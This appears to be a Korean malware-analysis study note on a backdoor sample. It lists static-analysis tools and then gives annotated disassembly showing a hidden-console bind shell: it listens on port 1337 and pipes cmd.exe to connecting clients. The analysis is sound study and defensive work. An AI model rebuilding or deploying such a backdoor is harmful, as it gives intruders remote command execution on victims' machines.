Back Door

( 기초 정적 분석 )

1. 패킹 유무 및 제작 프로그램을 확인   <- exeinfope

 

2. 실행 파일에 포함된 문자열 정보를 확인한다.  <-- bintext

  - 문자열

  - 사이트 주소

  - DLL , API 문자열

 

3. PE 구조를 확인한다

  - 제작 날짜 <-- (PE Veiw) , IAT 정보 ( DLL , API ) <-- ( depends ) 

 

4. 문자열 및 IAT 정보를 문서화해야한다.

 

5. 바이러스 토탈 사이트를 이용하여 자동화 분석을 실시한다.

 

6. 'PeStudio' 도구를 이용하여 

 

 

 

@ 고급 정적 분석

1. main 함수 분석

 1) main 함수

.text:00401000 ; int __cdecl main(int argc,const char **argv,const char *envp)
.text:00401000 _main           proc near               ; CODE XREF: ___tmainCRTStartup+10Ap
.text:00401000
.text:00401000 var_3D0         = dword ptr -3D0h
.text:00401000 Parameter       = dword ptr -3C4h
.text:00401000 timeout         = timeval ptr -3C0h
.text:00401000 var_3B8         = dword ptr -3B8h
.text:00401000 var_3B4         = dword ptr -3B4h
.text:00401000 readfds         = fd_set ptr -2B0h
.text:00401000 name            = sockaddr ptr -1A8h
.text:00401000 WSAData         = WSAData ptr -198h
.text:00401000 var_4           = dword ptr -4
.text:00401000 argc            = dword ptr  8
.text:00401000 argv            = dword ptr  0Ch
.text:00401000 envp            = dword ptr  10h
.text:00401000
.text:00401000                 push    ebp
.text:00401001                 mov     ebp, esp
.text:00401003                 and     esp, 0FFFFFFF8h
.text:00401006                 sub     esp, 3C4h
.text:0040100C                 mov     eax, dword_404000
.text:00401011                 xor     eax, esp
.text:00401013                 mov     [esp+3C4h+var_4], eax
.text:0040101A                 push    ebx
.text:0040101B                 push    esi
.text:0040101C                 push    edi
.text:0040101D                 call    ds:GetConsoleWindow
 - 윈도우 콘솔(윈도우창)을 얻어온다.
 
.text:00401023                 xor     esi, esi
.text:00401025                 push    esi             ; nCmdShow
.text:00401026                 push    eax             ; hWnd
.text:00401027                 call    ds:ShowWindow
 - 윈도우 상태를 안보이게 변경한다.

.text:0040102D                 push    esi             ; lpName
.text:0040102E                 push    esi             ; bInitialOwner
.text:0040102F                 push    esi             ; lpMutexAttributes
.text:00401030                 call    ds:CreateMutexA
 - 뮤텍스를 생성한다.
 - 다음 코드를 진행하다보면 뮤텍스 여부에 따른 분기 내용이 없기 때문에 의미 없는 동작이다.


.text:00401036                 mov     hHandle, eax
.text:0040103B                 lea     eax, [esp+3D0h+WSAData]
.text:00401042                 push    eax             ; lpWSAData
.text:00401043                 push    101h            ; wVersionRequested
.text:00401048                 mov     [esp+3D8h+timeout.tv_sec], 5
.text:00401050                 mov     [esp+3D8h+timeout.tv_usec], esi
.text:00401054                 mov     [esp+3D8h+var_3B8], esi
.text:00401058                 mov     [esp+3D8h+readfds.fd_count], esi
.text:0040105F                 call    WSAStartup
 - 통신을 하기 위해서 소켓을 초기화한다.
 - 소켓 통신을 하기 이전에 사용된다. (성공 : 0)

.text:00401064                 push    esi             ; protocol
.text:00401065                 push    1               ; type
.text:00401067                 push    2               ; af
.text:00401069                 call    socket
 - 소켓을 생성한다. (성공 : 0, 실패 : -1)

.text:0040106E                 mov     ecx, 2
.text:00401073                 push    539h            ; hostshort
.text:00401078                 mov     ebx, eax
.text:0040107A                 mov     [esp+3D4h+name.sa_family], cx
.text:00401082                 call    htons
 - 호스트 바이트 순서를 네트워크 바이트 순서로 변환한다.

.text:00401087                 push    10h             ; namelen
.text:00401089                 lea     edx, [esp+3D4h+name]
.text:00401090                 push    edx             ; name
.text:00401091                 mov     dword ptr [esp+3D8h+name.sa_data+2], esi
.text:00401098                 push    ebx             ; s
.text:00401099                 mov     word ptr [esp+3DCh+name.sa_data], ax
.text:004010A1                 mov     esi, 539h
.text:004010A6                 call    bind
 - 1337(539h) 포트 번호를 esi에 대입하고 소켓을 특정 포트로 할당한다. (성공 : 0, 실패 : -1)

.text:004010AB                 mov     edi, ds:printf
.text:004010B1                 cmp     eax, 0FFFFFFFFh
.text:004010B4                 jnz     short loc_4010FA
 - EAX('bind' 함수 리턴값)와 '-1'를 비교한다.

0 - -(1) = 1 ZF = 0 JNZ  점프 O (bind 함수 처리 성공)
-1 - (-1) = 0 ZF = 1 JNZ 점프 X (bind 함수 처리 실패)


 2) loc_4010B6 (bind 함수 처리 실패)

.text:004010B6 loc_4010B6:                             ; CODE XREF: _main+F8j
.text:004010B6                 inc     esi
.text:004010B7                 push    esi             ; hostshort
.text:004010B8                 call    htons
 - 호스트 바이트 순서를 네트워크 바이트 순서로 변환한다.

.text:004010BD                 push    offset aBindError ; "bind error"
.text:004010C2                 mov     word ptr [esp+3D4h+name.sa_data], ax
.text:004010CA                 call    edi ; printf
 - "bind error" 문자열을 스택에 PUSH하고 printf 함수를 이용하여 출력한다.

.text:004010CC                 add     esp, 4
.text:004010CF                 push    3E8h            ; dwMilliseconds
.text:004010D4                 call    ds:Sleep
 - 1000msec(3E8h) 동안 Sleep을 실시한다.

.text:004010DA                 lea     eax, [esi-539h]
.text:004010E0                 cmp     eax, 0Fh
.text:004010E3                 jg      short loc_4010FA
 - [esi-539h] 주소 값을 EAX에 대입하고  EAX와 '0Fh'를 비교한다.
 - EAX > 0Fh 인 경우, loc_4010FA으로 점프한다.
 - EAX > 0Fh 가 아닌 경우, 다음 코드를 진행한다.

.text:004010E5                 push    10h             ; namelen
.text:004010E7                 lea     ecx, [esp+3D4h+name]
.text:004010EE                 push    ecx             ; name
.text:004010EF                 push    ebx             ; s
.text:004010F0                 call    bind
 - bind 함수 처리가 실시된다.  (성공 : 0, 실패 : -1)

.text:004010F5                 cmp     eax, 0FFFFFFFFh
.text:004010F8                 jz      short loc_4010B6
 - EAX('bind' 함수 리턴값)와 '-1'를 비교한다.

0 - -(1) = 1 ZF = 0 JZ  점프 X (bind 함수 처리 성공)
-1 - (-1) = 0 ZF = 1 JZ 점프 O (bind 함수 처리 실패)


 3) loc_4010FA (bind 함수 처리 성공)

.text:004010FA loc_4010FA:                             ; CODE XREF: _main+B4j
.text:004010FA                                         ; _main+E3j
.text:004010FA                 push    0Fh             ; backlog
.text:004010FC                 push    ebx             ; s
.text:004010FD                 call    listen          ; Call Procedure
 - 'bind' 함수 처리가 성공되면 'listen' 함수를 이용하여 대기 상태로 만든다. (성공 : 0, 실패 : -1)

.text:00401102                 cmp     eax, 0FFFFFFFFh ; Compare Two Operands
.text:00401105                 jnz     short loc_40112D ; Jump if Not Zero (ZF=0)
 - EAX('listen' 함수 리턴값)와 '-1'를 비교한다.

0 - -(1) = 1 ZF = 0 JNZ  점프 O (listen 함수 처리 성공)
-1 - (-1) = 0 ZF = 1 JNZ 점프 X (listen 함수 처리 실패)

.text:00401107                 call    WSACleanup      ; Call Procedure
.text:0040110C                 push    offset aErrorListening ; "Error listening socket."
.text:00401111                 call    edi ; printf    ; Indirect Call Near Procedure
 - "Error listening socket." 스택에 PUSH하고 printf 함수를 통해서 출력한다.

.text:00401113                 mov     ecx, [esp+3D4h+var_4]
.text:0040111A                 add     esp, 4          ; Add
.text:0040111D                 pop     edi
.text:0040111E                 pop     esi
.text:0040111F                 pop     ebx
.text:00401120                 xor     ecx, esp        ; Logical Exclusive OR
.text:00401122                 xor     eax, eax        ; Logical Exclusive OR
.text:00401124                 call    sub_401974      ; Call Procedure
.text:00401129                 mov     esp, ebp
.text:0040112B                 pop     ebp
.text:0040112C                 retn                    ; Return Near from Procedure


 4) loc_40112D(listen 함수 처리 성공)

.text:0040112D loc_40112D:                             ; CODE XREF: _main+105j
.text:0040112D                 mov     [esp+3D0h+var_3B4], ebx
.text:00401131                 mov     [esp+3D0h+var_3B8], 1
.text:00401139                 lea     esp, [esp+0]    ; Load Effective Address
.text:00401140
.text:00401140 loc_401140:                             ; CODE XREF: _main+1B5j
.text:00401140                                         ; _main+1C5j
.text:00401140                 mov     [esp+3D0h+Parameter], 0FFFFFFFFh
.text:00401148
.text:00401148 loc_401148:                             ; CODE XREF: _main+1B3j
.text:00401148                 lea     edx, [esp+3D0h+timeout] ; Load Effective Address
.text:0040114C                 push    edx             ; timeout
.text:0040114D                 push    0               ; exceptfds
.text:0040114F                 push    0               ; writefds
.text:00401151                 lea     eax, [esp+3DCh+readfds] ; Load Effective Address
.text:00401158                 push    eax             ; readfds
.text:00401159                 lea     eax, [ebx+1]    ; Load Effective Address
.text:0040115C                 mov     ecx, 41h
.text:00401161                 lea     esi, [esp+3E0h+var_3B8] ; Load Effective Address
.text:00401165                 lea     edi, [esp+3E0h+readfds] ; Load Effective Address
.text:0040116C                 push    eax             ; nfds
.text:0040116D                 rep movsd               ; Move Byte(s) from String to String
.text:0040116F                 call    select          ; Call Procedure
 - I/O 동기화 관련 처리를 실시한다. (성공 : 0, 실패 : -1)

.text:00401174                 cmp     eax, 0FFFFFFFFh ; Compare Two Operands
.text:00401177                 jz      short loc_4011B7 ; Jump if Zero (ZF=1)
 - EAX('bind' 함수 리턴값)와 '-1'를 비교한다.

0 - -(1) = 1 ZF = 0 JZ  점프 X (select 함수 처리 성공)
-1 - (-1) = 0 ZF = 1 JZ 점프 O (select 함수 처리 실패)


.text:00401179                 test    eax, eax        ; Logical Compare
.text:0040117B                 jle     short loc_4011AE ; Jump if Less or Equal (ZF=1 | SF!=OF)
.text:0040117D                 push    0               ; addrlen
.text:0040117F                 push    0               ; addr
.text:00401181                 push    ebx             ; s
.text:00401182                 call    accept          ; Call Procedure
 - 클라이언트 접속 연결을 처리한다. (성공 :  0보다 크거나 같음, 실패 : -1)

.text:00401187                 push    0               ; lpThreadId
.text:00401189                 push    0               ; dwCreationFlags
.text:0040118B                 lea     ecx, [esp+3D8h+Parameter] ; Load Effective Address
.text:0040118F                 push    ecx             ; lpParameter
.text:00401190                 push    offset StartAddress ; lpStartAddress
.text:00401195                 push    0               ; dwStackSize
.text:00401197                 push    0               ; lpThreadAttributes
.text:00401199                 mov     [esp+3E8h+Parameter], eax
.text:0040119D                 call    ds:CreateThread ; Indirect Call Near Procedure
 - 쓰레드를 이용하여 연결된 클라이언트와의 통신을 처리한다.

.text:004011A3                 push    0C8h            ; dwMilliseconds
.text:004011A8                 call    ds:Sleep        ; Indirect Call Near Procedure
 - 200msec(0C8h) 동안 Sleep을 실시한다.

.text:004011AE
.text:004011AE loc_4011AE:                             ; CODE XREF: _main+17Bj
.text:004011AE                 cmp     [esp+3D0h+Parameter], 0FFFFFFFFh ; Compare Two Operands
.text:004011B3                 jz      short loc_401148 ; Jump if Zero (ZF=1)
.text:004011B5                 jmp     short loc_401140 ; Jump
 - 'loc_401140'로 무조건 점프한다. 

.text:004011B7 ; 컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴?
.text:004011B7
.text:004011B7 loc_4011B7:                             ; CODE XREF: _main+177j
.text:004011B7                 push    offset aSelect  ; "select"
.text:004011BC                 call    ds:perror       ; Indirect Call Near Procedure
.text:004011C2                 add     esp, 4          ; Add
.text:004011C5                 jmp     loc_401140      ; Jump
.text:004011C5 _main           endp


 5) main 함수에서 처리되는 내용

 - 윈도우창 생성 및 없애기, 뮤텍스 생성
 - 소켓 초기화/생성/바인딩/리스닝, 클라이언트 요청 수신
 - 쓰레드를 이용한 클라이언트 연결 처리


2. 'CreateThread' 함수 분석

 1) 'StartAddress' 내용 확인

.text:00401190                 push    offset StartAddress ; lpStartAddress
 - 'StartAddress'를 더블클릭하여 'CreateThread' 함수 인자값을 확인한다.

.text:00401195                 push    0               ; dwStackSize
.text:00401197                 push    0               ; lpThreadAttributes
.text:00401199                 mov     [esp+3E8h+Parameter], eax
.text:0040119D                 call    ds:CreateThread ; Indirect Call Near Procedure


 2) 'StartAddress' 분석
 
.text:004011D0 ; DWORD __stdcall StartAddress(LPVOID)
.text:004011D0 StartAddress    proc near               ; DATA XREF: _main+190o
.text:004011D0
.text:004011D0 BytesRead       = dword ptr -104A0h
.text:004011D0 hObject         = dword ptr -1049Ch
.text:004011D0 hNamedPipe      = dword ptr -10498h
.text:004011D0 s               = dword ptr -10494h
.text:004011D0 hReadPipe       = dword ptr -10490h
.text:004011D0 var_1048C       = dword ptr -1048Ch
.text:004011D0 hProcess        = dword ptr -10488h
.text:004011D0 ExitCode        = dword ptr -10478h
.text:004011D0 TotalBytesAvail = dword ptr -10474h
.text:004011D0 NumberOfBytesWritten= dword ptr -10470h
.text:004011D0 PipeAttributes  = _SECURITY_ATTRIBUTES ptr -1046Ch
.text:004011D0 StartupInfo     = _STARTUPINFOA ptr -10460h
.text:004011D0 var_10418       = byte ptr -10418h
.text:004011D0 var_10416       = byte ptr -10416h
.text:004011D0 var_10415       = byte ptr -10415h
.text:004011D0 var_10414       = byte ptr -10414h
.text:004011D0 var_10413       = byte ptr -10413h
.text:004011D0 var_10410       = byte ptr -10410h
.text:004011D0 var_1040E       = byte ptr -1040Eh
.text:004011D0 var_1040D       = byte ptr -1040Dh
.text:004011D0 var_1040C       = byte ptr -1040Ch
.text:004011D0 var_1040B       = byte ptr -1040Bh
.text:004011D0 buf             = byte ptr -10408h
.text:004011D0 Buffer          = byte ptr -10008h
.text:004011D0 var_4           = dword ptr -4
.text:004011D0 arg_0           = dword ptr  8
.text:004011D0
.text:004011D0                 push    ebp
.text:004011D1                 mov     ebp, esp
.text:004011D3                 and     esp, 0FFFFFFF8h ; Logical AND
.text:004011D6                 mov     eax, 104A4h
.text:004011DB                 call    __alloca_probe  ; Call Procedure
.text:004011E0                 mov     eax, dword_404000
.text:004011E5                 xor     eax, esp        ; Logical Exclusive OR
.text:004011E7                 mov     [esp+104A4h+var_4], eax
.text:004011EE                 mov     eax, hHandle
.text:004011F3                 push    ebx
.text:004011F4                 push    esi
.text:004011F5                 mov     esi, [ebp+arg_0]
.text:004011F8                 push    edi
.text:004011F9                 push    0FFFFFFFFh      ; dwMilliseconds
.text:004011FB                 push    eax             ; hHandle
.text:004011FC                 call    ds:WaitForSingleObject ; Indirect Call Near Procedure
 - EAX에 대입된 hHandle(뮤텍스)를 대기하고 소유권을 갖고 온다.

.text:00401202                 mov     edx, hHandle
.text:00401208                 mov     ecx, [esi]
.text:0040120A                 push    edx             ; hMutex
.text:0040120B                 mov     [esp+104B4h+s], ecx
.text:0040120F                 call    ds:ReleaseMutex ; Indirect Call Near Procedure
 - hHandle(뮤텍스) 소유권을 해제한다. 즉, 뮤텍스는 사용하지 않는다.

.text:00401215                 xor     ebx, ebx        ; Logical Exclusive OR
.text:00401217                 push    44h             ; size_t
.text:00401219                 lea     eax, [esp+104B4h+StartupInfo] ; Load Effective Address
.text:0040121D                 push    ebx             ; int
.text:0040121E                 push    eax             ; void *
.text:0040121F                 mov     [esp+104BCh+hObject], ebx
.text:00401223                 call    memset          ; Call Procedure
.text:00401228                 mov     edi, ds:CreatePipe
 - 'CreatePipe'를 EDI에 대입한다.

.text:0040122E                 add     esp, 0Ch        ; Add
.text:00401231                 xor     eax, eax        ; Logical Exclusive OR
.text:00401233                 push    ebx             ; nSize
.text:00401234                 lea     ecx, [esp+104B4h+PipeAttributes] ; Load Effective Address
.text:00401238                 push    ecx             ; lpPipeAttributes
.text:00401239                 lea     edx, [esp+104B8h+hObject] ; Load Effective Address
.text:0040123D                 mov     [esp+104B8h+hProcess], eax
.text:00401241                 mov     [esp+34h], eax
.text:00401245                 mov     [esp+38h], eax
.text:00401249                 mov     [esp+3Ch], eax
.text:0040124D                 push    edx             ; hWritePipe
.text:0040124E                 lea     eax, [esp+104BCh+hReadPipe] ; Load Effective Address
.text:00401252                 push    eax             ; hReadPipe
.text:00401253                 mov     [esp+104C0h+StartupInfo.cb], 44h
.text:0040125B                 mov     [esp+104C0h+PipeAttributes.nLength], 0Ch
.text:00401263                 mov     [esp+104C0h+PipeAttributes.lpSecurityDescriptor], ebx
.text:00401267                 mov     [esp+104C0h+PipeAttributes.bInheritHandle], 1
.text:0040126F                 call    edi ; CreatePipe ; Indirect Call Near Procedure
 - 파이프를 생성한다.

.text:00401271                 push    ebx             ; nSize
.text:00401272                 lea     ecx, [esp+104B4h+PipeAttributes] ; Load Effective Address
.text:00401276                 push    ecx             ; lpPipeAttributes
.text:00401277                 lea     edx, [esp+104B8h+var_1048C] ; Load Effective Address
.text:0040127B                 push    edx             ; hWritePipe
.text:0040127C                 lea     eax, [esp+104BCh+hNamedPipe] ; Load Effective Address
.text:00401280                 push    eax             ; hReadPipe
.text:00401281                 call    edi ; CreatePipe ; Indirect Call Near Procedure
 - 파이프를 생성한다.

.text:00401283                 lea     ecx, [esp+104B0h+StartupInfo] ; Load Effective Address
.text:00401287                 push    ecx             ; lpStartupInfo
.text:00401288                 call    ds:GetStartupInfoA ; Indirect Call Near Procedure
 - Startupinfo 구조체가 입력되어 실행된 프로세스 정보를 가져온다.
 - 2개의 파이프(입력/출력)를 이용하여 다음에 처리될 프로세스(cmd.exe)를 연결하기 위해서이다.

.text:0040128E                 mov     eax, [esp+104B0h+var_1048C]
.text:00401292                 mov     [esp+104B0h+StartupInfo.hStdOutput], eax
.text:00401299                 mov     [esp+104B0h+StartupInfo.hStdError], eax
.text:004012A0                 mov     eax, [esp+104B0h+hReadPipe]
.text:004012A4                 mov     [esp+104B0h+StartupInfo.hStdInput], eax
.text:004012AB                 mov     al, 0Ah
.text:004012AD                 xor     edx, edx        ; Logical Exclusive OR
.text:004012AF                 push    offset aCWindowsSystem ; "C:\\Windows\\System32\\cmd.exe"
 - 'cmd.exe'를 스택에 PUSH 한다.

.text:004012B4                 mov     [esp+104B4h+StartupInfo.dwFlags], 101h
.text:004012BF                 mov     [esp+104B4h+StartupInfo.wShowWindow], dx
.text:004012C7                 mov     [esp+104B4h+var_10418], 65h
.text:004012CF                 mov     byte ptr [esp+9Dh], 78h
.text:004012D7                 mov     [esp+104B4h+var_10416], 69h
.text:004012DF                 mov     [esp+104B4h+var_10415], 74h
.text:004012E7                 mov     [esp+104B4h+var_10414], al
.text:004012EE                 mov     [esp+104B4h+var_10413], bl
.text:004012F5                 mov     [esp+104B4h+var_10410], 45h
.text:004012FD                 mov     byte ptr [esp+0A5h], 58h
.text:00401305                 mov     [esp+104B4h+var_1040E], 49h
.text:0040130D                 mov     [esp+104B4h+var_1040D], 54h
.text:00401315                 mov     [esp+104B4h+var_1040C], al
.text:0040131C                 mov     [esp+104B4h+var_1040B], bl
.text:00401323                 call    ds:_strdup      ; Indirect Call Near Procedure
.text:00401329                 mov     esi, ds:Sleep
.text:0040132F                 add     esp, 4          ; Add
.text:00401332                 push    14h             ; dwMilliseconds
.text:00401334                 mov     edi, eax
.text:00401336                 call    esi ; Sleep     ; Indirect Call Near Procedure
.text:00401338                 lea     ecx, [esp+104B0h+hProcess] ; Load Effective Address
.text:0040133C                 push    ecx             ; lpProcessInformation
.text:0040133D                 lea     edx, [esp+104B4h+StartupInfo] ; Load Effective Address
.text:00401341                 push    edx             ; lpStartupInfo
.text:00401342                 push    ebx             ; lpCurrentDirectory
.text:00401343                 push    ebx             ; lpEnvironment
.text:00401344                 push    10h             ; dwCreationFlags
.text:00401346                 push    1               ; bInheritHandles
.text:00401348                 push    ebx             ; lpThreadAttributes
.text:00401349                 push    ebx             ; lpProcessAttributes
.text:0040134A                 push    edi             ; lpCommandLine
.text:0040134B                 push    ebx             ; lpApplicationName
.text:0040134C                 call    ds:CreateProcessA ; Indirect Call Near Procedure
 - 새로운 프로세스와 쓰레드를 생성한다. (성공 : 0 X, 실패 : 0)

.text:00401352                 test    eax, eax        ; Logical Compare
.text:00401354                 jnz     short loc_40136E ; Jump if Not Zero (ZF=0)

 - TEST 결과 값이 '0'인 경우,  ZF = 1 JNZ -> 점프 X (CreateProcessA 함수 실패)
 - TEST 결과 값이 '0'이 아닌 경우,  ZF = 0 JNZ -> 점프 O (CreateProcessA 함수 성공)


.text:00401356                 mov     eax, ds:?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A ; std::basic_ostream<char,std::char_traits> std::cout
.text:0040135B                 push    offset aCouldNotSpawnC ; "Could not spawn cmd.exe\n"
.text:00401360                 push    eax
.text:00401361                 call    sub_401650      ; Call Procedure
.text:00401366                 add     esp, 8          ; Add
.text:00401369                 jmp     loc_4015F3      ; Jump


 3) loc_40136E(CreateProcessA 함수 성공 : cmd.exe 실행)

.text:0040136E loc_40136E:                             ; CODE XREF: StartAddress+184j
.text:0040136E                 mov     edx, [esp+104B0h+hProcess]
.text:00401372                 lea     ecx, [esp+104B0h+ExitCode] ; Load Effective Address
.text:00401376                 push    ecx             ; lpExitCode
.text:00401377                 push    edx             ; hProcess
.text:00401378                 call    ds:GetExitCodeProcess ; Indirect Call Near Procedure
 - 프로세스 종료 상태를 검사한다. (성공 : 0 X, 실패 : 0)
 - 프로세스가 종료 상태이면, '0'이 아닌 값을 리턴하고, 종료된 상태가 아니면 '0'을 리턴한다.

.text:0040137E                 cmp     eax, 103h       ; Compare Two Operands
.text:00401383                 jz      loc_40156B      ; Jump if Zero (ZF=1)
 - CMP 결과 값이 '0'인 경우,  ZF = 1 JZ -> 점프 O (GetExitCodeProcess 함수 성공)
  프로세스 실행 상태 X

 - CMP 결과 값이 '0'이 아닌 경우,  ZF = 0 JZ -> 점프 X (GetExitCodeProcess 함수 실패)
프로스세가 실행 상태 O

.text:00401389                 mov     edi, ds:PeekNamedPipe
.text:0040138F                 nop                     ; No Operation
.text:00401390
.text:00401390 loc_401390:                             ; CODE XREF: StartAddress+395j
.text:00401390                 push    1F4h            ; dwMilliseconds
.text:00401395                 mov     [esp+104B4h+BytesRead], ebx
.text:00401399                 call    esi ; Sleep     ; Indirect Call Near Procedure
.text:0040139B                 push    ebx             ; lpBytesLeftThisMessage
.text:0040139C                 lea     eax, [esp+104B4h+TotalBytesAvail] ; Load Effective Address
.text:004013A0                 push    eax             ; lpTotalBytesAvail
.text:004013A1                 mov     eax, [esp+104B8h+hNamedPipe]
.text:004013A5                 lea     ecx, [esp+104B8h+BytesRead] ; Load Effective Address
.text:004013A9                 push    ecx             ; lpBytesRead
.text:004013AA                 push    0FFFFh          ; nBufferSize
.text:004013AF                 lea     edx, [esp+104C0h+Buffer] ; Load Effective Address
.text:004013B6                 push    edx             ; lpBuffer
.text:004013B7                 push    eax             ; hNamedPipe
.text:004013B8                 call    edi ; PeekNamedPipe ; Indirect Call Near Procedure
.text:004013BA                 cmp     [esp+104B0h+BytesRead], ebx ; Compare Two Operands
.text:004013BE                 jz      loc_401459      ; Jump if Zero (ZF=1)

-------------------------------------------------------------------------------------
@ 고급 동적 분석